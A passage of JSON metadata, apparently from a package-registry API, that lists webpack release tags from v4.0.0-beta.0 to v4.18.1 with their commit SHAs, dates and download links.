yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https: